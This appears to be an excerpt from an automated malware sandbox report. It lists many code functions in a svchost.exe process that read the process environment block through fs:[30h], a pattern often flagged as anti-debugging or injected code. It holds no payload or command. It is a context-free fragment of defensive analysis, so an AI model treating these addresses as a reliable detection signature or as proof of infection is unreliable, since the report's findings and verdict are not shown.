            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]2_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]2_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]2_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2826B mov eax, dword ptr fs:[00000030h]2_2_02F2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A250 mov eax, dword ptr fs:[00000030h]2_2_02F2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36259 mov eax, dword ptr fs:[00000030h]2_2_02F36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB8243 mov eax, dword ptr fs:[00000030h]2_2_02FB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB8243 mov ecx, dword ptr fs:[00000030h]2_2_02FB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2823B mov eax, dword ptr fs:[00000030h]2_2_02F2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]2_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]2_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]2_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F663FF mov eax, dword ptr fs:[00000030h]2_2_02F663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h]2_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h]2_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE3DB mov ecx, dword ptr fs:[00000030h]2_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h]2_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD43D4 mov eax, dword ptr fs:[00000030h]2_2_02FD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD43D4 mov eax, dword ptr fs:[00000030h]2_2_02FD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEC3CD mov eax, dword ptr fs:[00000030h]2_2_02FEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB63C0 mov eax, dword ptr fs:[00000030h]2_2_02FB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]2_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]2_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]2_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]2_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]2_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]2_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5438F mov eax, dword ptr fs:[00000030h]2_2_02F5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5438F mov eax, dword ptr fs:[00000030h]2_2_02F5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD437C mov eax, dword ptr fs:[00000030h]2_2_02FD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov ecx, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA352 mov eax, dword ptr fs:[00000030h]2_2_02FFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD8350 mov ecx, dword ptr fs:[00000030h]2_2_02FD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C310 mov ecx, dword ptr fs:[00000030h]2_2_02F2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F50310 mov ecx, dword ptr fs:[00000030h]2_2_02F50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]2_2_02F6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]2_2_02F6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]2_2_02F6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C0F0 mov eax, dword ptr fs:[00000030h]2_2_02F2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F720F0 mov ecx, dword ptr fs:[00000030h]2_2_02F720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_02F2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F380E9 mov eax, dword ptr fs:[00000030h]2_2_02F380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB60E0 mov eax, dword ptr fs:[00000030h]2_2_02FB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB20DE mov eax, dword ptr fs:[00000030h]2_2_02FB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF60B8 mov eax, dword ptr fs:[00000030h]2_2_02FF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF60B8 mov ecx, dword ptr fs:[00000030h]2_2_02FF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC80A8 mov eax, dword ptr fs:[00000030h]2_2_02FC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3208A mov eax, dword ptr fs:[00000030h]2_2_02F3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5C073 mov eax, dword ptr fs:[00000030h]2_2_02F5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32050 mov eax, dword ptr fs:[00000030h]2_2_02F32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6050 mov eax, dword ptr fs:[00000030h]2_2_02FB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6030 mov eax, dword ptr fs:[00000030h]2_2_02FC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A020 mov eax, dword ptr fs:[00000030h]2_2_02F2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C020 mov eax, dword ptr fs:[00000030h]2_2_02F2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030061E5 mov eax, dword ptr fs:[00000030h]2_2_030061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB4000 mov ecx, dword ptr fs:[00000030h]2_2_02FB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F601F8 mov eax, dword ptr fs:[00000030h]2_2_02F601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF61C3 mov eax, dword ptr fs:[00000030h]2_2_02FF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF61C3 mov eax, dword ptr fs:[00000030h]2_2_02FF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F70185 mov eax, dword ptr fs:[00000030h]2_2_02F70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEC188 mov eax, dword ptr fs:[00000030h]2_2_02FEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEC188 mov eax, dword ptr fs:[00000030h]2_2_02FEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4180 mov eax, dword ptr fs:[00000030h]2_2_02FD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4180 mov eax, dword ptr fs:[00000030h]2_2_02FD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C156 mov eax, dword ptr fs:[00000030h]2_2_02F2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC8158 mov eax, dword ptr fs:[00000030h]2_2_02FC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36154 mov eax, dword ptr fs:[00000030h]2_2_02F36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36154 mov eax, dword ptr fs:[00000030h]2_2_02F36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov ecx, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60124 mov eax, dword ptr fs:[00000030h]2_2_02F60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov ecx, dword ptr fs:[00000030h]2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF0115 mov eax, dword ptr fs:[00000030h]2_2_02FF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB06F1 mov eax, dword ptr fs:[00000030h]2_2_02FB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB06F1 mov eax, dword ptr fs:[00000030h]2_2_02FB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_02F6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A6C7 mov eax, dword ptr fs:[00000030h]2_2_02F6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F666B0 mov eax, dword ptr fs:[00000030h]2_2_02F666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C6A6 mov eax, dword ptr fs:[00000030h]2_2_02F6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34690 mov eax, dword ptr fs:[00000030h]2_2_02F34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34690 mov eax, dword ptr fs:[00000030h]2_2_02F34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F62674 mov eax, dword ptr fs:[00000030h]2_2_02F62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF866E mov eax, dword ptr fs:[00000030h]2_2_02FF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF866E mov eax, dword ptr fs:[00000030h]2_2_02FF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A660 mov eax, dword ptr fs:[00000030h]2_2_02F6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A660 mov eax, dword ptr fs:[00000030h]2_2_02F6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4C640 mov eax, dword ptr fs:[00000030h]2_2_02F4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E627 mov eax, dword ptr fs:[00000030h]2_2_02F4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F66620 mov eax, dword ptr fs:[00000030h]2_2_02F66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68620 mov eax, dword ptr fs:[00000030h]2_2_02F68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3262C mov eax, dword ptr fs:[00000030h]2_2_02F3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72619 mov eax, dword ptr fs:[00000030h]2_2_02F72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE609 mov eax, dword ptr fs:[00000030h]2_2_02FAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F347FB mov eax, dword ptr fs:[00000030h]2_2_02F347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F347FB mov eax, dword ptr fs:[00000030h]2_2_02F347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]2_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]2_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]2_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE7E1 mov eax, dword ptr fs:[00000030h]2_2_02FBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3C7C0 mov eax, dword ptr fs:[00000030h]2_2_02F3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB07C3 mov eax, dword ptr fs:[00000030h]2_2_02FB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F307AF mov eax, dword ptr fs:[00000030h]2_2_02F307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD678E mov eax, dword ptr fs:[00000030h]2_2_02FD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38770 mov eax, dword ptr fs:[00000030h]2_2_02F38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30750 mov eax, dword ptr fs:[00000030h]2_2_02F30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE75D mov eax, dword ptr fs:[00000030h]2_2_02FBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72750 mov eax, dword ptr fs:[00000030h]2_2_02F72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72750 mov eax, dword ptr fs:[00000030h]2_2_02F72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB4755 mov eax, dword ptr fs:[00000030h]2_2_02FB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6674D mov esi, dword ptr fs:[00000030h]2_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6674D mov eax, dword ptr fs:[00000030h]2_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6674D mov eax, dword ptr fs:[00000030h]2_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6273C mov eax, dword ptr fs:[00000030h]2_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6273C mov ecx, dword ptr fs:[00000030h]2_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6273C mov eax, dword ptr fs:[00000030h]2_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAC730 mov eax, dword ptr fs:[00000030h]2_2_02FAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C720 mov eax, dword ptr fs:[00000030h]2_2_02F6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C720 mov eax, dword ptr fs:[00000030h]2_2_02F6C720
